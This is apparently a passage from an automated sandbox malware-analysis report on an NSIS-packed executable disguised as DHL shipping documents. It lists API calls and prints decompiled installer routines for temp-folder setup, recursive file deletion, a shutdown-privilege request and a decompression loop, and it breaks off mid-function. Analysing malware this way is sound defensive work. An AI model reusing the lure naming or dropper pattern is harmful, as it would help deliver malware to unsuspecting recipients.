                        0x00403aeb
                        0x00403af2
                        0x00403afc
                        0x00403b08
                        0x00403b0e
                        0x00403b14
                        0x00403b17
                        0x00403b21
                        0x00403b27
                        0x00403b29
                        0x00403b2d
                        0x00403b3e
                        0x00403b44
                        0x00403b49
                        0x00403b4b
                        0x00403b4e
                        0x00403b54
                        0x00403b54
                        0x00403b4b
                        0x00403b29
                        0x00403b57
                        0x00403b5e
                        0x00403b5e
                        0x00403b5e
                        0x00403b5e
                        0x00403b65
                        0x00000000
                        0x00403b65
                        0x00403a97
                        0x00403a1b
                        0x00403a1e
                        0x00403a22
                        0x00403a27
                        0x00403a29
                        0x00000000
                        0x00000000
                        0x00403a35
                        0x00403a40
                        0x00403a45
                        0x00000000
                        0x00403a45
                        0x004039c3
                        0x004039db
                        0x004039ec
                        0x004039ed
                        0x004039f1
                        0x004039f3
                        0x00403a01
                        0x00403a08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a08
                        0x00403a0a
                        0x00000000
                        0x00403a0a
                        0x0040392d
                        0x00403939
                        0x0040393e
                        0x00403943
                        0x00403945
                        0x00000000
                        0x00000000
                        0x0040394d
                        0x00403955
                        0x00403966
                        0x0040396e
                        0x00403970
                        0x00403975
                        0x00403977
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403977
                        0x00000000
                        0x004038d4
                        0x0040387d
                        0x0040387f
                        0x00000000
                        0x00000000
                        0x00403881
                        0x00403885
                        0x00403889
                        0x00403890
                        0x00403890
                        0x00403890
                        0x00403890
                        0x00000000
                        0x00403890
                        0x0040388b
                        0x0040388e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040388e
                        0x00403827
                        0x0040382b
                        0x0040382e
                        0x00403835
                        0x00403835
                        0x00000000
                        0x00403835
                        0x00403830
                        0x00403833
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403833
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403801
                        0x00403801
                        0x00403802
                        0x00403803
                        0x00403803
                        0x00000000
                        0x00403801
                        0x00000000

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                        • GetVersionExW.KERNEL32(?), ref: 0040368C
                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                        • OleInitialize.OLE32(00000000), ref: 0040377D
                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                        • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000020,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000000), ref: 004037E9
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                        • DeleteFileW.KERNELBASE(1033), ref: 00403982
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                          • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000000,?), ref: 00403A8F
                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,00420F08,00000001), ref: 00403B21
                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                        • ExitProcess.KERNEL32(?), ref: 00403B6C
                        • OleUninitialize.OLE32(?), ref: 00403B71
                        • ExitProcess.KERNEL32 ref: 00403B8B
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                        • ExitWindowsEx.USER32 ref: 00403BFE
                        • ExitProcess.KERNEL32 ref: 00403C1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 2292928366-4095228552
                        • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                        • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                        • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                        • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                        C-Code - Quality: 98%
                        			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                        0x00405d7e
                        0x00405d83
                        0x00405d8c
                        0x00405d8f
                        0x00405d97
                        0x00405d9a
                        0x00405d9d
                        0x00405da5
                        0x00405da7
                        0x00405da8
                        0x00000000
                        0x00405da8
                        0x00405db3
                        0x00405db6
                        0x00405db6
                        0x00405db6
                        0x00405dba
                        0x00405dcd
                        0x00405dd4
                        0x00405dd9
                        0x00405ddd
                        0x00405ded
                        0x00405ddf
                        0x00405de5
                        0x00405de5
                        0x00405df2
                        0x00405df6
                        0x00405e02
                        0x00405e08
                        0x00405e0d
                        0x00405e13
                        0x00405e1e
                        0x00405e24
                        0x00405e26
                        0x00405e29
                        0x00405ed3
                        0x00405ed3
                        0x00405ed7
                        0x00405ed9
                        0x00405ed9
                        0x00405ed9
                        0x00405ed9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405e2f
                        0x00405e2f
                        0x00405e2f
                        0x00405e37
                        0x00405e57
                        0x00405e5f
                        0x00405e64
                        0x00405e6b
                        0x00405e86
                        0x00405e8b
                        0x00405e8d
                        0x00405eb1
                        0x00405e8f
                        0x00405e8f
                        0x00405e92
                        0x00405ea6
                        0x00405e94
                        0x00405e97
                        0x00405e9f
                        0x00405e9f
                        0x00405e92
                        0x00405e6d
                        0x00405e73
                        0x00405e75
                        0x00405e7b
                        0x00405e7b
                        0x00405e75
                        0x00000000
                        0x00405e6b
                        0x00405e39
                        0x00405e41
                        0x00000000
                        0x00000000
                        0x00405e43
                        0x00405e4b
                        0x00000000
                        0x00000000
                        0x00405e4d
                        0x00405e55
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405eb6
                        0x00405ebe
                        0x00405ec4
                        0x00405ec4
                        0x00405ecd
                        0x00000000
                        0x00405ecd
                        0x00405df8
                        0x00405e00
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405dbc
                        0x00405dbc
                        0x00405dbe
                        0x00405ede
                        0x00405ee0
                        0x00405ee3
                        0x00405f34
                        0x00405f34
                        0x00405f34
                        0x00405ee5
                        0x00405ee8
                        0x00405ef3
                        0x00405ef8
                        0x00405efa
                        0x00000000
                        0x00000000
                        0x00405efd
                        0x00405f09
                        0x00405f0e
                        0x00405f10
                        0x00000000
                        0x00405f2b
                        0x00405f12
                        0x00405f15
                        0x00000000
                        0x00000000
                        0x00405f1a
                        0x00000000
                        0x00405f21
                        0x00405eea
                        0x00405eea
                        0x00000000
                        0x00405eea
                        0x00405dc4
                        0x00405dc7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405dc7

                        APIs
                        • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,\*.*), ref: 00405DE5
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                        • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                        • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                        • FindClose.KERNELBASE(00000000), ref: 00405ECD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*$\*.*
                        • API String ID: 2035342205-3378084780
                        • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                        • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                        • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                        • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                        C-Code - Quality: 98%
                        			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
